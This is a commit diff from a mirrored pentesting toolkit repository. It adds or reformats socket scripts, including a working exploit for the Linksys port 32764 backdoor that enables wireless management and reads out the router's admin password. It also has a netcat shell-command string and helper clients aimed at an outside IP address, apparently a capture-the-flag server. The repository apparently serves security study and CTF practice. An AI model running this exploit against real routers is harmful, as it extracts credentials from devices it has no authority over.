mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-02 14:56:10 -04:00
socket adds
This commit is contained in:
parent
5f1dc0b4c4
commit
d01824f424
7 changed files with 66 additions and 20 deletions
|
@ -1,3 +1,8 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import socket
|
||||
import struct
|
||||
import sys
|
||||
|
@ -7,23 +12,33 @@ HOST = '192.168.33.1'
|
|||
PORT = 32764
|
||||
|
||||
def send_message(s, message, payload=''):
|
||||
|
||||
header = struct.pack('<III', 0x53634D4D, message, len(payload))
|
||||
s.send(header+payload)
|
||||
response = s.recv(0xC)
|
||||
|
||||
if len(response) != 12:
|
||||
print("Device is not a crackable Linksys router.")
|
||||
print("Recieved invalid response: %s" % response)
|
||||
raise sys.exit(1)
|
||||
|
||||
sig, ret_val, ret_len = struct.unpack('<III', response)
|
||||
|
||||
assert(sig == 0x53634D4D)
|
||||
|
||||
if ret_val != 0:
|
||||
return ret_val, "ERROR"
|
||||
ret_str = ""
|
||||
|
||||
while len(ret_str) < ret_len:
|
||||
ret_str += s.recv(ret_len-len(ret_str))
|
||||
ret_str += s.recv(ret_len - len(ret_str))
|
||||
|
||||
return ret_val, ret_str
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
send_message(s, 3, "wlan_mgr_enable=1")
|
||||
print send_message(s, 2, "http_password")
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
send_message(s, 3, "wlan_mgr_enable=1")
|
||||
print send_message(s, 2, "http_password")
|
||||
|
|
|
@ -1,31 +1,35 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
|
||||
__author__ = "bt3gl"
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import socket
|
||||
|
||||
PORT = 12345
|
||||
HOSTNAME = '54.209.5.48'
|
||||
|
||||
|
||||
def netcat(hostname, port, content):
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((hostname, port))
|
||||
s.sendall(content)
|
||||
s.shutdown(socket.SHUT_WR)
|
||||
adata = []
|
||||
|
||||
while 1:
|
||||
data = s.recv(1024)
|
||||
if data == "":
|
||||
break
|
||||
adata.append(data)
|
||||
|
||||
s.close()
|
||||
|
||||
return adata
|
||||
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
PORT = 12345
|
||||
HOSTNAME = '54.209.5.48'
|
||||
message = netcat(HOSTNAME, PORT, '')[1]
|
||||
print message
|
|
@ -1,7 +1,6 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
|
||||
__author__ = "bt3gl"
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import os
|
||||
|
@ -50,7 +49,6 @@ def ntext():
|
|||
|
||||
|
||||
|
||||
|
||||
def main():
|
||||
SHELL_COMMAND = "nc 54.209.5.48 12345"
|
||||
|
||||
|
|
|
@ -1,22 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
|
||||
__author__ = "bt3gl"
|
||||
|
||||
|
||||
from telnetlib import Telnet
|
||||
|
||||
|
||||
# examples of telnet connections
|
||||
PORT = 12345
|
||||
HOST = '54.209.5.48'
|
||||
|
||||
# creating connection
|
||||
tn = Telnet(HOST ,PORT)
|
||||
|
||||
# reading input
|
||||
msg_in2 = tn.read_all().dec_msg()
|
||||
tn.read_until(b'psifer text: ')
|
||||
|
||||
# writing outputs
|
||||
tn.write(msg.encode() + b'\n')
|
6
Network_and_802.11/socket/tcp_client.py
Normal file
6
Network_and_802.11/socket/tcp_client.py
Normal file
|
@ -0,0 +1,6 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
__author__ = "bt3"
|
||||
|
||||
|
||||
import socket
|
Loading…
Add table
Add a link
Reference in a new issue